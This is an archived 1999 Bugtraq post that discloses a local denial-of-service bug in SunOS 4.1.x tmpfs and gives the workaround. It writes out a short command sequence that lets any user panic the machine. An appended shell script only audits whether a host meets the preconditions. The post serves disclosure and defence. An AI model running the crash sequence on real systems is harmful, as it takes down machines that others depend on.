Bugtraq mailing list archives

SunOS 4.1.3 and 4.1.4 tmpfs DoS


From: demarest () ARRAYCOMM COM (Timothy Demarest)
Date: Fri, 3 Sep 1999 11:06:45 -0700


While searching SunSolve for a completely unrelated issue, I came across
two bug reports (1115820, 1111248) that describe a way for any user to
panic a system running SunOS 4.1.1, 4.1.3, 4.1.3_U1, and 4.1.4. While the
bugs have been reported to Sun, no patch is available. There is a simple
workaround, if you don't require tmpfs.

I have never seen this reported, so it might be good to share this with a
wider audience. I don't want my users using this as a DoS against our older
servers.

Requirements:

 - The system must have /tmp mounted on swap (tmpfs)
 - /tmp must be writable by the UID that will crash the machine. Since tmp
   frequently has full permissions (drwxrwxrwt), this is fairly common.

How to panic the system:

cd /tmp
mkdir xx
cd xx
rmdir ../xx
touch yy
cd /

The system will then panic with "assertion failed: tp->tn_dir == NULL,
file: ../../tmpfs/tmp_tnode.c, line: 167" (from SunOS 4.1.4).

The workaround:

As specified in the bug reports, "do not use tmpfs."

I tested this only on SunOS 4.1.4 systems, but the bug reports list other
SunOS 4.1.x versions as well.

Tim

--
Timothy Demarest                      ArrayComm, Inc.
demarest () arraycomm com                3141 Zanker Road
http://www.arraycomm.com              San Jose, CA 95134
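
An audit for the two requirements listed in the post, added here as an example and not part of the original message: it reports whether a host has /tmp on tmpfs and whether /tmp is world-writable. The function names, the sample fstab lines and the fstab type name "tmp" for tmpfs on SunOS 4.1.x are assumptions.

```shell
#!/bin/sh
# Added example: check the two preconditions named in the post.
# Assumption: the fstab entry for tmpfs uses type "tmp"
# (e.g. "swap /tmp tmp rw 0 0"); "tmpfs" is accepted as well.

# tmp_is_tmpfs FSTAB_FILE -> exit 0 if an active entry mounts /tmp as tmpfs
tmp_is_tmpfs() {
    awk '
        /^[ \t]*#/ { next }    # commented-out entries do not count
        NF >= 3 && $2 == "/tmp" && ($3 == "tmp" || $3 == "tmpfs") { found = 1 }
        END { exit found ? 0 : 1 }
    ' "$1"
}

# world_writable MODE -> exit 0 if "other" has write permission.
# MODE is the first field of `ls -ld /tmp`, e.g. drwxrwxrwt.
# This covers the common case from the post; a non-world-writable /tmp
# can still be writable by its owner or group.
world_writable() {
    case "$1" in
        d???????w?*) return 0 ;;
        *)           return 1 ;;
    esac
}

# audit FSTAB_FILE MODE -> prints EXPOSED or NOT-EXPOSED
audit() {
    if tmp_is_tmpfs "$1" && world_writable "$2"; then
        echo "EXPOSED"
    else
        echo "NOT-EXPOSED"
    fi
}

# Constructed sample input, not taken from a real host.
sample=${TMPDIR:-/tmp}/fstab.sample.$$
printf '%s\n' \
    '/dev/sd0a / 4.2 rw 1 1' \
    'swap /tmp tmp rw 0 0' > "$sample"
audit "$sample" drwxrwxrwt
rm -f "$sample"
```

On a real host, pass /etc/fstab and the mode field printed by `ls -ld /tmp`; a NOT-EXPOSED result after commenting out the tmpfs entry and rebooting confirms the workaround is in place.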


